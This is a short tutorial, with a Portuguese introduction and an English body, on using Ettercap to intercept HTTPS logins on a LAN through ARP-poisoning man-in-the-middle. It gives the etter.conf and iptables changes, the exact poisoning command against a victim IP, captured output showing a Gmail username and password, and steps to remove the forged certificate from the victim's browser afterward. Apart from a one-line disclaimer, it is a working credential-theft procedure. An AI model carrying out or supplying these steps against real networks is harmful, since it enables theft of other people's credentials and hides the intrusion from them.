O Ettercap é uma ferramenta de monitoramento ( sniffer ) no qual pode ser usado como estudo de aplicações, análise forense entre outros fins. O intuito deste artigo é explicar como configurar o Ettercap para tirar melhor proveito. Artigo em inglês *** WARNING : This HOWTO is for educational only. Do NOT carry out the following steps on a LAN that without permission. Otherwise, you will be put into the jail. *** Sniffing SSL (https) traffic on LAN with ettercap by mean of Man In The Middle (MITM) attack. Step 1 : nano /etc/etter.conf Make the change as the following : [privs] ec_uid = 0 # nobody is the default ec_gid = 0 # nobody is the default Uncomment the following : # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" Step 2 : Victim's machine is at 192.168.1.100 while the router is at 192.168.1.1. Attacker is at 192.168.1.115. ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/ The outcome of the display is as the following : ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Dissector "dns" not supported (etter.conf line 72) Listening on eth0... (Ethernet) eth0 -> 08:00:27:FF:95:DB 192.168.1.115 255.255.255.0 Privileges dropped to UID 0 GID 0... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Scanning for merged targets (2 hosts)... * |=================================================>| 100.00 % 2 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2 Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help Step 3 : At the victim's machine, open a browser, such as Firefox and go to GMail. You will be asked to accept an untrusted certification. Just accept the certificate and you will be directed to the login screen of GMail. When the victim login to the GMail, his/her username and password will be logged on the Attacker's machine. The display will be similar to the following : HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s You will find that USER: samiux and PASS: password. Remarks : To delete the untrusted certificate on Firefox at victim's machine : "Edit" -- "Perference" -- "View Certificate List" -- "Server". You will find something like the following. You just delete them all.